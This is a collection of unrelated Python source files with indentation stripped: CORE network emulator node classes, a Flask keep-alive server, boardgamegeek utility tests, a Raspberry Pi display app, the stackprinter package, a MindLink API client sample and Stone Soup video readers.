current = f"{address}/{self.prefix.prefixlen}"
net_client = get_net_client(use_ovs, utils.cmd)
net_client.create_address(self.brname, current)
servers = self.session.distributed.servers
for name in servers:
server = servers[name]
index -= 1
address = self.prefix[index]
current = f"{address}/{self.prefix.prefixlen}"
net_client = get_net_client(use_ovs, server.remote_cmd)
net_client.create_address(self.brname, current)
def startup(self) -> None:
"""
Startup functionality for the control network.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
if self.net_client.existing_bridges(self.id):
raise CoreError(f"old bridges exist for node: {self.id}")
super().startup()
logging.info("added control network bridge: %s %s", self.brname, self.prefix)
if self.hostid and self.assign_address:
self.add_addresses(self.hostid)
elif self.assign_address:
self.add_addresses(-2)
if self.updown_script:
logging.info(
"interface %s updown script (%s startup) called",
self.brname,
self.updown_script,
)
self.host_cmd(f"{self.updown_script} {self.brname} startup")
if self.serverintf:
self.net_client.set_iface_master(self.brname, self.serverintf)
def shutdown(self) -> None:
"""
Control network shutdown.
:return: nothing
"""
if self.serverintf is not None:
try:
self.net_client.delete_iface(self.brname, self.serverintf)
except CoreCommandError:
logging.exception(
"error deleting server interface %s from bridge %s",
self.serverintf,
self.brname,
)
if self.updown_script is not None:
try:
logging.info(
"interface %s updown script (%s shutdown) called",
self.brname,
self.updown_script,
)
self.host_cmd(f"{self.updown_script} {self.brname} shutdown")
except CoreCommandError:
logging.exception("error issuing shutdown script shutdown")
super().shutdown()
def links(self, flags: MessageFlags = MessageFlags.NONE) -> List[LinkData]:
"""
Do not include CtrlNet in link messages describing this session.
:param flags: message flags
:return: list of link data
"""
return []
class PtpNet(CoreNetwork):
"""
Peer to peer network node.
"""
policy: NetworkPolicy = NetworkPolicy.ACCEPT
def attach(self, iface: CoreInterface) -> None:
"""
Attach a network interface, but limit attachment to two interfaces.
:param iface: network interface
:return: nothing
"""
if len(self.ifaces) >= 2:
raise CoreError("ptp links support at most 2 network interfaces")
super().attach(iface)
def links(self, flags: MessageFlags = MessageFlags.NONE) -> List[LinkData]:
"""
Build CORE API TLVs for a point-to-point link. One Link message
describes this network.
:param flags: message flags
:return: list of link data
"""
all_links = []
if len(self.ifaces) != 2:
return all_links
ifaces = self.get_ifaces()
iface1 = ifaces[0]
iface2 = ifaces[1]
unidirectional = 0
if iface1.getparams() != iface2.getparams():
unidirectional = 1
mac = str(iface1.mac) if iface1.mac else None
iface1_data = InterfaceData(
id=iface1.node.get_iface_id(iface1), name=iface1.name, mac=mac
)
ip4 = iface1.get_ip4()
if ip4:
iface1_data.ip4 = str(ip4.ip)
iface1_data.ip4_mask = ip4.prefixlen
ip6 = iface1.get_ip6()
if ip6:
iface1_data.ip6 = str(ip6.ip)
iface1_data.ip6_mask = ip6.prefixlen
mac = str(iface2.mac) if iface2.mac else None
iface2_data = InterfaceData(
id=iface2.node.get_iface_id(iface2), name=iface2.name, mac=mac
)
ip4 = iface2.get_ip4()
if ip4:
iface2_data.ip4 = str(ip4.ip)
iface2_data.ip4_mask = ip4.prefixlen
ip6 = iface2.get_ip6()
if ip6:
iface2_data.ip6 = str(ip6.ip)
iface2_data.ip6_mask = ip6.prefixlen
options_data = iface1.get_link_options(unidirectional)
link_data = LinkData(
message_type=flags,
type=self.linktype,
node1_id=iface1.node.id,
node2_id=iface2.node.id,
iface1=iface1_data,
iface2=iface2_data,
options=options_data,
)
all_links.append(link_data)
# build a 2nd link message for the upstream link parameters
# (swap if1 and if2)
if unidirectional:
iface1_data = InterfaceData(id=iface2.node.get_iface_id(iface2))
iface2_data = InterfaceData(id=iface1.node.get_iface_id(iface1))
options_data = iface2.get_link_options(unidirectional)
link_data = LinkData(
message_type=MessageFlags.NONE,
type=self.linktype,
node1_id=iface2.node.id,
node2_id=iface1.node.id,
iface1=iface1_data,
iface2=iface2_data,
options=options_data,
)
all_links.append(link_data)
return all_links
class SwitchNode(CoreNetwork):
"""
Provides switch functionality within a core node.
"""
apitype: NodeTypes = NodeTypes.SWITCH
policy: NetworkPolicy = NetworkPolicy.ACCEPT
type: str = "lanswitch"
class HubNode(CoreNetwork):
"""
Provides hub functionality within a core node, forwards packets to all bridge
ports by turning off MAC address learning.
"""
apitype: NodeTypes = NodeTypes.HUB
policy: NetworkPolicy = NetworkPolicy.ACCEPT
type: str = "hub"
def startup(self) -> None:
"""
Startup for a hub node; disables MAC address learning after normal startup.
:return: nothing
"""
super().startup()
self.net_client.set_mac_learning(self.brname, LEARNING_DISABLED)
class WlanNode(CoreNetwork):
"""
Provides wireless lan functionality within a core node.
"""
apitype: NodeTypes = NodeTypes.WIRELESS_LAN
linktype: LinkTypes = LinkTypes.WIRED
policy: NetworkPolicy = NetworkPolicy.DROP
type: str = "wlan"
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
server: "DistributedServer" = None,
policy: NetworkPolicy = None,
) -> None:
"""
Create a WlanNode instance.
:param session: core session instance
:param _id: node id
:param name: node name
:param server: remote server the node will run on; default is None for localhost
:param policy: wlan policy
"""
super().__init__(session, _id, name, server, policy)
# wireless and mobility models (BasicRangeModel, Ns2WaypointMobility)
self.model: Optional[WirelessModel] = None
self.mobility: Optional[WayPointMobility] = None
def startup(self) -> None:
"""
Startup for a wlan node; flags the ebtables chain for rebuild after normal startup.
:return: nothing
"""
super().startup()
ebq.ebchange(self)
def attach(self, iface: CoreInterface) -> None:
"""
Attach a network interface.
:param iface: network interface
:return: nothing
"""
super().attach(iface)
if self.model:
iface.poshook = self.model.position_callback
iface.setposition()
def setmodel(self, model: "WirelessModelType", config: Dict[str, str]):
"""
Sets the mobility and wireless model.
:param model: wireless model to set to
:param config: configuration for model being set
:return: nothing
"""
logging.debug("node(%s) setting model: %s", self.name, model.name)
if model.config_type == RegisterTlvs.WIRELESS:
self.model = model(session=self.session, _id=self.id)
for iface in self.get_ifaces():
iface.poshook = self.model.position_callback
iface.setposition()
self.updatemodel(config)
elif model.config_type == RegisterTlvs.MOBILITY:
self.mobility = model(session=self.session, _id=self.id)
self.mobility.update_config(config)
def update_mobility(self, config: Dict[str, str]) -> None:
if not self.mobility:
raise CoreError(f"no mobility set to update for node({self.name})")
self.mobility.update_config(config)
def updatemodel(self, config: Dict[str, str]) -> None:
if not self.model:
raise CoreError(f"no model set to update for node({self.name})")
logging.debug(
"node(%s) updating model(%s): %s", self.id, self.model.name, config
)
self.model.update_config(config)
for iface in self.get_ifaces():
iface.setposition()
def links(self, flags: MessageFlags = MessageFlags.NONE) -> List[LinkData]:
"""
Retrieve all link data.
:param flags: message flags
:return: list of link data
"""
links = super().links(flags)
if self.model:
links.extend(self.model.links(flags))
return links
class TunnelNode(GreTapBridge):
"""
Provides tunnel functionality in a core node.
"""
apitype: NodeTypes = NodeTypes.TUNNEL
policy: NetworkPolicy = NetworkPolicy.ACCEPT
type: str = "tunnel"
|
server.py
|
# PackedBerry Server
from flask import Flask
from threading import Thread
import logging
import time
app = Flask('')
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
@app.route('/')
def home():
f = open('index.html', 'r')
d = f.read()
f.close()
html = str(d)
return html
def run():
try:
app.run(host='0.0.0.0',port=2021)
except Exception as e:
print(e)
def status():
t = Thread(target=run)
t.start()
def super_run():
def super():
while True:
status()
time.sleep( 60 * 60 )
super_thread = Thread(target=super)
super_thread.start()
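# A minimal usage sketch (assumed, not part of this file): the surrounding
# project would import and call super_run() once at startup so the keep-alive
# web server runs in a background thread.
#
#   from server import super_run
#   super_run()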
|
test_utils.py
|
import pickle
import threading
import time
import pytest
import boardgamegeek.utils as bggutil
from _common import *
from boardgamegeek.objects.things import Thing
def test_get_xml_subelement_attr(xml):
node = bggutil.xml_subelement_attr(None, "hello")
assert node is None
node = bggutil.xml_subelement_attr(xml, None)
assert node is None
node = bggutil.xml_subelement_attr(xml, "")
assert node is None
node = bggutil.xml_subelement_attr(xml, "node1", attribute="attr")
assert node == "hello1"
node = bggutil.xml_subelement_attr(xml, "node1", attribute="int_attr", convert=int)
assert node == 1
# test that default works
node = bggutil.xml_subelement_attr(xml, "node_thats_missing", default="hello")
assert node == "hello"
node = bggutil.xml_subelement_attr(xml, "node1", attribute="attribute_thats_missing", default=1234)
assert node == 1234
# test quiet
with pytest.raises(Exception):
# attr can't be converted to int
node = bggutil.xml_subelement_attr(xml, "node1", attribute="attr", convert=int)
node = bggutil.xml_subelement_attr(xml, "node1", attribute="attr", convert=int, quiet=True)
assert node is None
node = bggutil.xml_subelement_attr(xml, "node1", attribute="attr", convert=int, default=999, quiet=True)
assert node == 999
def test_get_xml_subelement_attr_list(xml):
nodes = bggutil.xml_subelement_attr_list(None, "list")
assert nodes is None
nodes = bggutil.xml_subelement_attr_list(xml, None)
assert nodes is None
nodes = bggutil.xml_subelement_attr_list(xml, "")
assert nodes is None
list_root = xml.find("list")
nodes = bggutil.xml_subelement_attr_list(list_root, "li", attribute="attr")
assert nodes == ["elem1", "elem2", "elem3", "elem4"]
nodes = bggutil.xml_subelement_attr_list(list_root, "li", attribute="int_attr", convert=int)
assert nodes == [1, 2, 3, 4]
nodes = bggutil.xml_subelement_attr_list(xml, "node1", attribute="attr")
assert nodes == ["hello1"]
# test default
nodes = bggutil.xml_subelement_attr_list(list_root, "li", attribute="missing_attr", default="n/a")
assert nodes == ["n/a", "n/a", "n/a", "n/a"]
# test quiet
with pytest.raises(Exception):
nodes = bggutil.xml_subelement_attr_list(list_root, "li", attribute="attr", convert=int)
nodes = bggutil.xml_subelement_attr_list(list_root, "li", attribute="attr", convert=int, quiet=True)
assert nodes == [None, None, None, None]
nodes = bggutil.xml_subelement_attr_list(list_root, "li", attribute="attr", convert=int, quiet=True, default=1)
assert nodes == [1, 1, 1, 1]
def test_get_xml_subelement_text(xml):
node = bggutil.xml_subelement_text(None, "node1")
assert node is None
node = bggutil.xml_subelement_text(xml, None)
assert node is None
node = bggutil.xml_subelement_text(None, "")
assert node is None
node = bggutil.xml_subelement_text(xml, "node1")
assert node == "text"
# test that default is working
node = bggutil.xml_subelement_text(xml, "node_thats_missing", default="default text")
assert node == "default text"
# test that quiet is working
with pytest.raises(Exception):
node = bggutil.xml_subelement_text(xml, "node1", convert=int)
node = bggutil.xml_subelement_text(xml, "node1", convert=int, quiet=True)
assert node is None
node = bggutil.xml_subelement_text(xml, "node1", convert=int, quiet=True, default="asd")
assert node == "asd"
@pytest.mark.serialize
def test_serialization():
dummy_plays = Thing({"id": "10", "name": "fubar"})
s = pickle.dumps(dummy_plays)
assert s is not None
dummy_unserialized = pickle.loads(s)
assert type(dummy_unserialized) == Thing
def test_rate_limiting_for_requests():
# create two threads, give each a list of games to fetch, disable cache and time the amount needed to
# fetch the data. requests should be serialized, even if made from two different threads
test_set_1 = [5, # acquire
31260, # agricola
72125] # "eclipse"
test_set_2 = [18602, # caylus
28720, # brass
53953] # thunderstone]
def _worker_thread(games):
bgg = BGGClient(cache=None, requests_per_minute=20)
for g in games:
bgg.game(game_id=g)
t1 = threading.Thread(target=_worker_thread, args=(test_set_1, ))
t2 = threading.Thread(target=_worker_thread, args=(test_set_2, ))
start_time = time.time()
t1.start()
t2.start()
t1.join(timeout=10000)
t2.join(timeout=10000)
end_time = time.time()
# 20 requests per minute => a request every 3 seconds x 6 games => should take around 18 seconds
assert 15 < end_time - start_time < 21 # +/- a few seconds...
# second test, use caching and confirm it's working when combined with the rate limiting algorithm
# do cached requests for the test set, then do them again. should take only half of the time
bgg = BGGClient(requests_per_minute=20)
start_time = time.time()
for g in test_set_1:
bgg.game(game_id=g)
end_time = time.time()
assert 7 < end_time - start_time < 17 # 3 games should take ~9 seconds
# repeat requests, should be served from cache
for g in test_set_1:
bgg.game(game_id=g)
assert 0 < time.time() - end_time < 2
def test_html_unescape_function():
escaped = "<tag>"
unescaped = bggutil.html_unescape(escaped)
assert unescaped == "<tag>"
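# Editorial note (hedged): the timing asserts in test_rate_limiting_for_requests follow
# from simple arithmetic. With requests serialized at `requests_per_minute`, n requests
# take at least (n - 1) * 60 / requests_per_minute seconds, because the first request
# fires immediately. The helper below is an illustration only and is not used by the tests.
def _expected_min_duration(n_requests, requests_per_minute):
    """Rough lower bound, in seconds, for n serialized rate-limited requests."""
    return (n_requests - 1) * 60.0 / requests_per_minute
# _expected_min_duration(6, 20) == 15.0, matching `assert 15 < elapsed < 21`
# _expected_min_duration(3, 20) == 6.0; the cached test allows 7-17 s because each
# request also spends time on the network.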
|
App.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
import threading
import time
import atexit
from modules.Blinkt import Blinkt
from modules.Config import *
from modules.Data import Data
from modules.Log import log_str
from modules.ScrollPhat import ScrollPhat
from modules.UniCorn import UniCorn
from modules.Update import Update
class App(object):
def __init__(self):
self.name = 'myApp'
log_str('init {}'.format(self.name))
self.running = True
atexit.register(self.stop)
def start(self):
log_str('start {}'.format(self.name))
log_str('still alive {}'.format(self.running))
# do init stuff here
self.clear_all(True)
Blinkt().show_graph()
ScrollPhat().show_str()
UniCorn().draw_animation()
try:
log_str('still alive {}'.format(self.running))
# start all loops
Update().data_loop()
ScrollPhat().show_str(Data().output_str())
Blinkt().show_graph(Data().get_rain_forecast())
UniCorn().icon_loop()
log_str('after the image loop')
Blinkt().led_loop()
log_str('after the led loop')
ScrollPhat().str_loop()
log_str('after the scroll loop')
while self.running:
time.sleep(1)
log_str('still alive {}'.format(self.running))
log_str('still alive {}'.format(self.running))
except KeyboardInterrupt:
log_str('*** quit: {}'.format(self.name))
atexit._run_exitfuncs()
def stop(self):
log_str('stop {}'.format(self.name))
self.quit_all()
def quit_all(self):
log_str('kill all timers')
try:
for timer in TIMER:
timer.cancel()
finally:
self.clear_all(False)
def run(self):
log_str('run {}'.format(self.name))
self.start()
def clear_all(self, fast=True):
log_str('clear all {}'.format(self.name))
Blinkt().clear(fast)
ScrollPhat().clear(fast)
UniCorn().clear(fast)
if __name__ == '__main__':
myApp = App()
if sys.argv[1] == 'icon_test':
pass
elif sys.argv[1] == 'run':
main_thread = threading.Thread(target=myApp.run, daemon=True)  # pass the method itself, do not call it here
THREADS.append(main_thread)
main_thread.start()
elif sys.argv[1] == 'clear':
myApp.stop()
else:
pass
|
__init__.py
|
import sys
import types
import warnings
from threading import Thread
from functools import wraps
import stackprinter.formatting as fmt
from stackprinter.tracing import TracePrinter, trace
def _guess_thing(f):
""" default to the current exception or current stack frame"""
# the only reason this happens up here is to keep sys._getframe at the same
# call depth relative to an invocation of `show` or `format`, even when
# `format` is called _by_ `show`.
@wraps(f)
def show_or_format(thing=None, *args, **kwargs):
if thing is None:
thing = sys.exc_info()
if thing == (None, None, None):
thing = sys._getframe(1)
return f(thing, *args, **kwargs)
return show_or_format
@_guess_thing
def format(thing=None, **kwargs):
"""
Render the traceback of an exception or a frame's call stack
Call this without arguments inside an `except` block to get a traceback for
the currently handled exception:
```
try:
something()
except:
logger.err(stackprinter.format(**kwargs))
```
Explicitly pass an exception (or a triple as returned by `sys.exc_info()`)
to handle that particular exception anywhere, also outside an except block.
```
try:
something()
except Exception as e:
last_exc = e
if last_exc:
logger.err(stackprinter.format(last_exc, **kwargs))
```
Pass a frame object to see the call stack leading up to that frame:
```
stack = stackprinter.format(sys._getframe(2), **kwargs))
```
Pass a thread object to see its current call stack:
```
thread = threading.Thread(target=something)
thread.start()
# (...)
stack = stackprinter.format(thread, **kwargs))
```
Note:
This displays variable values as they are _at the time of formatting_. In
multi-threaded programs, variables can change while we're busy walking
the stack & printing them. So, if nothing seems to make sense, consider that
your exception and the traceback messages are from slightly different times.
Sadly, there is no responsible way to freeze all other threads as soon
as we want to inspect some thread's call stack (...or is there?)
Params
---
thing: (optional) exception, sys.exc_info() tuple, frame or thread
What to format. Defaults to the currently handled exception or current
stack frame.
style: string
'plaintext' (default): Output just text
'darkbg', 'darkbg2', 'darkbg3', 'lightbg', 'lightbg2', 'lightbg3':
Enable colors, for use in terminals that support 256 ansi
colors or in jupyter notebooks (or even with `ansi2html`)
source_lines: int or 'all'
Select how much source code context will be shown.
int 0: Don't include a source listing.
int n > 0: Show n lines of code. (default: 5)
string 'all': Show the whole scope of the frame.
show_signature: bool (default True)
Always include the function header in the source code listing.
show_vals: str or None
Select which variable values will be shown.
'line': Show only the variables on the highlighted line.
'like_source' (default): Show only those visible in the source listing
'all': Show every variable in the scope of the frame.
None: Don't show any variable values.
truncate_vals: int
Maximum number of characters to be used for each variable value.
Default: 500
suppressed_paths: list of regex patterns
Set less verbose formatting for frames whose code lives in certain paths
(e.g. library code). Files whose path matches any of the given regex
patterns will be considered boring. The first call to boring code is
rendered with fewer code lines (but with argument values still visible),
while deeper calls within boring code get a single line and no variable
values.
Example: To hide numpy internals from the traceback, set
`suppressed_paths=[r"lib/python.*/site-packages/numpy"]`
reverse: bool
List the innermost frame first.
add_summary: True, False, 'auto'
Append a compact list of involved files and source lines, similar
to the built-in traceback message.
'auto' (default): do that if the main traceback is longer than 50 lines.
"""
if isinstance(thing, types.FrameType):
return fmt.format_stack_from_frame(thing, **kwargs)
elif isinstance(thing, Thread):
return format_thread(thing, **kwargs)
elif isinstance(thing, Exception):
exc_info = (thing.__class__, thing, thing.__traceback__)
return format(exc_info, **kwargs)
elif _is_exc_info(thing):
return fmt.format_exc_info(*thing, **kwargs)
else:
raise ValueError("Can't format %s. "\
"Expected an exception instance, sys.exc_info() tuple,"\
"a frame or a thread object." % repr(thing))
@_guess_thing
def show(thing=None, file='stderr', **kwargs):
"""
Print the traceback of an exception or a frame's call stack
Params
---
file: 'stderr', 'stdout' or file-like object
defaults to stderr
**kwargs:
See `format`
"""
if file == 'stderr':
file = sys.stderr
elif file == 'stdout':
file = sys.stdout
print(format(thing, **kwargs), file=file)
def format_current_stack(**kwargs):
""" Render the current thread's call stack.
Params
--
**kwargs:
See `format`
"""
return format(sys._getframe(1), **kwargs)
def show_current_stack(**kwargs):
""" Print the current thread's call stack.
Params
--
**kwargs:
See `show`
"""
show(sys._getframe(1), **kwargs)
def format_current_exception(**kwargs):
"""
Render a traceback for the currently handled exception.
Params
--
**kwargs:
See `format`
"""
return format(sys.exc_info(), **kwargs)
def show_current_exception(file=sys.stderr, **kwargs):
"""
Print a traceback for the currently handled exception.
Params
--
**kwargs:
See `show`
"""
print(format_current_exception(**kwargs), file=file)
def set_excepthook(**kwargs):
"""
Set sys.excepthook to print a detailed traceback for any uncaught exception.
See `format()` for available kwargs.
Examples:
----
Print to stdout instead of stderr:
```
set_excepthook(file='stdout')
```
Enable color output:
```
set_excepthook(style='darkbg') # or e.g. 'lightbg' (for more options see `format`)
```
If running under Ipython, this will, with a heavy heart, attempt to monkey
patch Ipython's traceback printer (which handles all exceptions internally,
thus bypassing the system excepthook). You can decide whether this sounds
like a sane idea.
To undo, call `remove_excepthook`.
Params
--
**kwargs:
See `show` and `format`
"""
if _is_running_in_ipython():
_patch_ipython_excepthook(**kwargs)
else:
def hook(*args):
show(args, **kwargs)
sys.excepthook = hook
def remove_excepthook():
""" Reinstate the default excepthook """
if _is_running_in_ipython():
_unpatch_ipython_excepthook()
sys.excepthook = sys.__excepthook__
def _is_running_in_ipython():
try:
return __IPYTHON__
except NameError:
return False
ipy_tb = None
def _patch_ipython_excepthook(**kwargs):
""" Replace ipython's built-in traceback printer, excellent though it is"""
global ipy_tb
blacklist = kwargs.get('suppressed_paths', [])
blacklist.append('site-packages/IPython/')
kwargs['suppressed_paths'] = blacklist
if 'file' in kwargs:
del kwargs['file']
def format_tb(*exc_tuple, **__):
unstructured_tb = format(exc_tuple, **kwargs)
structured_tb = [unstructured_tb] # \*coughs*
return structured_tb
import IPython
shell = IPython.get_ipython()
if ipy_tb is None:
ipy_tb = shell.InteractiveTB.structured_traceback
shell.InteractiveTB.structured_traceback = format_tb
def _unpatch_ipython_excepthook():
""" restore proper order in Ipython """
import IPython
shell = IPython.get_ipython()
if ipy_tb is not None:
shell.InteractiveTB.structured_traceback = ipy_tb
def _is_exc_info(thing):
if not isinstance(thing, tuple) or len(thing) != 3:
return False
a, b, c = thing
return (isinstance(a, type) and BaseException in a.mro() and
isinstance(b, BaseException))
def format_thread(thread, add_summary=False, **kwargs):
try:
fr = sys._current_frames()[thread.ident]
except KeyError:
return "%r: no frames found" % thread
else:
if 'suppressed_paths' not in kwargs:
kwargs['suppressed_paths'] = []
kwargs['suppressed_paths'] += [r"lib/python.*/threading\.py"]
msg = fmt.format_stack_from_frame(fr, **kwargs)
msg_indented = ' ' + '\n '.join(msg.split('\n')).strip()
return "%r\n\n%s" % (thread, msg_indented)
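# Hedged usage sketch (editorial addition): minimal ways to exercise the public helpers
# defined above. The chosen style and the sleeping worker thread are assumptions for
# illustration only.
if __name__ == '__main__':
    import threading
    import time

    set_excepthook(style='plaintext')  # detailed tracebacks for uncaught exceptions

    worker = threading.Thread(target=time.sleep, args=(10,), daemon=True)
    worker.start()
    print(format_thread(worker))  # call stack of the running thread

    try:
        1 / 0
    except ZeroDivisionError:
        show()  # prints a traceback for the currently handled exception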
|
api_connection.py
|
"""
MindLink API samples.
For more information, visit our developer wiki @https://wiki.mindlinksoft.com/tiki-index.php?page=MindLink+API and our engineering blog @https://engineering.mindlinksoft.com/
The samples are provided "as is". Do feel free to experiment or use them as you deem fit. Have fun!
ApiConnection.py
This module exposes methods to perform authentication and basic collaboration operations, such as getting and sending messages and streaming message events from channels.
For usage samples, check the sample_bot.py file.
"""
import requests
import threading
class ApiConnection:
def __init__(self, host, username, password, agent):
self.host = host
self.username = username
self.password = password
self.agent = agent
self.last_event = 0
self.running = False
self.token = ''
def authenticate(self):
request_url = '{}/Authentication/V1/Tokens'.format(self.host)
response = requests.post(request_url, json = {
'Username': self.username,
'Password': self.password,
'AgentId': self.agent
}, headers = {
'Accept' : 'application/json'
})
if response.status_code == 200:
self.token = response.json()
return self.token
print ('Something went wrong while authenticating!', response.status_code, response.reason)
def get_messages(self, channel_id, count):
if self.token == '':
self.authenticate()
request_url = '{}/Collaboration/V1/Channels/{}/Messages'.format(self.host, channel_id)
parameters = {
'take': count,
}
response = requests.get(
request_url,
params = parameters,
headers = {
'Accept' : 'application/json',
'Authorization': 'FCF {}'.format(self.token)}
)
if response.status_code == 200:
return response.json()
print ('Something went wrong while getting messages!', response.status_code, response.reason)
def send_message(self, channel_id, content, is_alert, classification, security_context):
if self.token == '':
self.authenticate()
request_url = '{}/Collaboration/V1/Channels/{}/Messages'.format(self.host, channel_id)
response = requests.post(
request_url,
json = {
'Text': content,
'IsAlert': is_alert,
'Classification': classification,
'SecurityContext': security_context
},
headers = {
'Accept' : 'application/json',
'Authorization': 'FCF {}'.format(self.token)}
)
if response.status_code != 200:
print ('Something went wrong while sending a message to a channel!', channel_id, response.status_code, response.reason)
def send_message_parts(self, channel_id, messageParts, is_alert, classification, security_context):
if self.token == '':
self.authenticate()
request_url = '{}/Collaboration/V1/Channels/{}/Messages'.format(self.host, channel_id)
response = requests.post(
request_url,
json = {
'MessageParts': messageParts,
'IsAlert': is_alert,
'Classification': classification,
'SecurityContext': security_context
},
headers = {
'Accept' : 'application/json',
'Authorization': 'FCF {}'.format(self.token)}
)
if response.status_code != 200:
print ('Something went wrong while sending a message-part message to a channel!', channel_id, response.status_code, response.reason)
def update_channel_agent_state(self, channel_id, is_composing):
if self.token == '':
self.authenticate()
request_url = '{}/Collaboration/V1/Channels/{}/Me'.format(self.host, channel_id)
response = requests.post(
request_url,
json = {
'IsComposing': is_composing
},
headers = {
'Accept' : 'application/json',
'Authorization': 'FCF {}'.format(self.token)}
)
if response.status_code != 200:
print ('Something went wrong while updating channel agent state!', channel_id, response.status_code, response.reason)
def get_events(self, channel_id, callback):
if self.token == '':
self.authenticate()
self.running = True
while self.running:
request_url = '{}/Collaboration/V1/Events'.format(self.host)
parameters = {
'last-event': self.last_event,
'types': ['message'],
'channels': [channel_id],
'regex': '',
'origins': 'remote'
}
response = requests.get(
request_url,
params = parameters,
headers = {
'Accept' : 'application/json',
'Authorization': 'FCF {}'.format(self.token)
})
if response.status_code != 200:
print ('Something went wrong while getting events!', response.status_code, response.reason)
continue
for event in response.json():
eventId = event['EventId']
if eventId > self.last_event:
self.last_event = eventId
callback(event)
def start_streaming(self, channel_id, callback):
self.events_thread = threading.Thread(target=self.get_events, args = (channel_id, callback))
self.events_thread.start()
def stop_streaming(self):
self.running = False
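# Hedged usage sketch (editorial addition): a minimal flow through the class above.
# The host, credentials, agent id and channel id are placeholders, not values from
# the MindLink samples.
if __name__ == '__main__':
    connection = ApiConnection('https://mindlink.example.com', 'bot-user', 'secret', 'agent-1')
    connection.authenticate()
    print(connection.get_messages('channel-1', count=5))
    connection.send_message('channel-1', 'Hello from the sample bot', False, None, None)

    def on_event(event):
        print('received event', event.get('EventId'))

    connection.start_streaming('channel-1', on_event)
    # ... later, when shutting down:
    connection.stop_streaming()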
|
video.py
|
# -*- coding: utf-8 -*-
"""Video readers for Stone Soup.
This is a collection of video readers for Stone Soup, allowing quick reading
of video data/streams.
"""
import datetime
import threading
from abc import abstractmethod
from queue import Queue
from typing import Mapping, Tuple, Sequence, Any
from urllib.parse import ParseResult
import numpy as np
try:
import ffmpeg
import moviepy.editor as mpy
except ImportError as error:
raise ImportError(
"Usage of video processing classes requires that the optional"
"package dependencies 'moviepy' and 'ffmpeg-python' are installed. "
"This can be achieved by running "
"'python -m pip install stonesoup[video]'")\
from error
from .base import SensorDataReader
from .file import FileReader
from .url import UrlReader
from ..base import Property
from ..buffered_generator import BufferedGenerator
from ..types.sensordata import ImageFrame
class FrameReader(SensorDataReader):
"""FrameReader base class
A FrameReader produces :class:`~.SensorData` in the form of
:class:`~ImageFrame` objects.
"""
@property
def frame(self):
return self.sensor_data
@abstractmethod
@BufferedGenerator.generator_method
def frames_gen(self):
"""Returns a generator of frames for each time step.
Yields
------
: :class:`datetime.datetime`
Datetime of current time step
: set of :class:`~.ImageFrame`
Generated frame in the time step
"""
raise NotImplementedError
@BufferedGenerator.generator_method
def sensor_data_gen(self):
"""Returns a generator of frames for each time step.
Note
----
This is just a wrapper around (and therefore performs identically
to) :meth:`~frames_gen`.
Yields
------
: :class:`datetime.datetime`
Datetime of current time step
: set of :class:`~.ImageFrame`
Generated frame in the time step
"""
yield from self.frames_gen()
class VideoClipReader(FileReader, FrameReader):
"""VideoClipReader
A simple reader that uses MoviePy_ to read video frames from a file.
Usage of MoviePy allows for the application of clip transformations
and effects, as per the MoviePy documentation_. Upon instantiation,
the underlying MoviePy `VideoFileClip` instance can be accessed
through the :attr:`~clip` class property. This can then be used
as expected, e.g.:
.. code-block:: python
# Rearrange RGB to BGR
def arrange_bgr(image):
return image[:, :, [2, 1, 0]]
reader = VideoClipReader("path_to_file")
reader.clip = reader.clip.fl_image(arrange_bgr)
for timestamp, frame in reader:
# The generated frame.pixels will now
# be arranged in BGR format.
...
.. _MoviePy: https://zulko.github.io/moviepy/index.html
.. _documentation: https://zulko.github.io/moviepy/getting_started/effects.html
""" # noqa:E501
start_time: datetime.timedelta = Property(
doc="Start time expressed as duration from the start of the clip",
default=datetime.timedelta(seconds=0))
end_time: datetime.timedelta = Property(
doc="End time expressed as duration from the start of the clip",
default=None)
timestamp: datetime.datetime = Property(
doc="Timestamp given to the first frame",
default=None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
end_time_sec = self.end_time.total_seconds() if self.end_time is not None else None
self.clip = mpy.VideoFileClip(str(self.path)) \
.subclip(self.start_time.total_seconds(), end_time_sec)
@BufferedGenerator.generator_method
def frames_gen(self):
if self.timestamp is None:
self.timestamp = datetime.datetime.now()
start_time = self.timestamp
for timestamp_sec, pixels in self.clip.iter_frames(with_times=True):
timestamp = start_time + datetime.timedelta(seconds=timestamp_sec)
frame = ImageFrame(pixels, timestamp)
yield timestamp, frame
class FFmpegVideoStreamReader(UrlReader, FrameReader):
""" FFmpegVideoStreamReader
A threaded reader that uses ffmpeg-python_ to read frames from video
streams (e.g. RTSP) in real-time.
Notes
-----
- Use of this class requires that FFmpeg_ is installed on the host machine.
- By default, FFmpeg performs internal buffering of frames leading to a \
slight delay in the incoming frames (0.5-1 sec). To remove the delay it \
is recommended to set ``input_opts={'threads': 1, 'fflags': 'nobuffer'}`` \
when instantiating a reader, e.g.:
.. code-block:: python
video_reader = FFmpegVideoStreamReader('rtsp://192.168.0.10:554/1/h264minor',
input_opts={'threads': 1, 'fflags': 'nobuffer'})
for timestamp, frame in video_reader:
....
.. _ffmpeg-python: https://github.com/kkroening/ffmpeg-python
.. _FFmpeg: https://www.ffmpeg.org/download.html
"""
url: ParseResult = Property(
doc="Input source to read video stream from, passed as input url argument. This can "
"include any valid FFmpeg input e.g. rtsp URL, device name when using 'dshow'/'v4l2'")
buffer_size: int = Property(
default=1,
doc="Size of the frame buffer. The frame buffer is used to cache frames in cases where "
"the stream generates frames faster than they are ingested by the reader. If "
"`buffer_size` is less than or equal to zero, the buffer size is infinite.")
input_opts: Mapping[str, str] = Property(
default=None,
doc="FFmpeg input options, provided in the form of a dictionary, whose keys correspond to "
"option names. (e.g. ``{'fflags': 'nobuffer'}``). The default is ``{}``.")
output_opts: Mapping[str, str] = Property(
default=None,
doc="FFmpeg output options, provided in the form of a dictionary, whose keys correspond "
"to option names. The default is ``{'f': 'rawvideo', 'pix_fmt': 'rgb24'}``.")
filters: Sequence[Tuple[str, Sequence[Any], Mapping[Any, Any]]] = Property(
default=None,
doc="FFmpeg filters, provided in the form of a list of filter name, sequence of "
"arguments, mapping of key/value pairs (e.g. ``[('scale', ('320', '240'), {})]``). "
"Default `None` where no filter will be applied. Note that :attr:`frame_size` may "
"need to be set when the video size is changed by a filter.")
frame_size: Tuple[int, int] = Property(
default=None,
doc="Tuple of frame width and height. Default `None` where it will be detected using "
"`ffprobe` against the input, but this may yield wrong width/height (e.g. when "
"filters are applied), and as such this option can be used to override.")
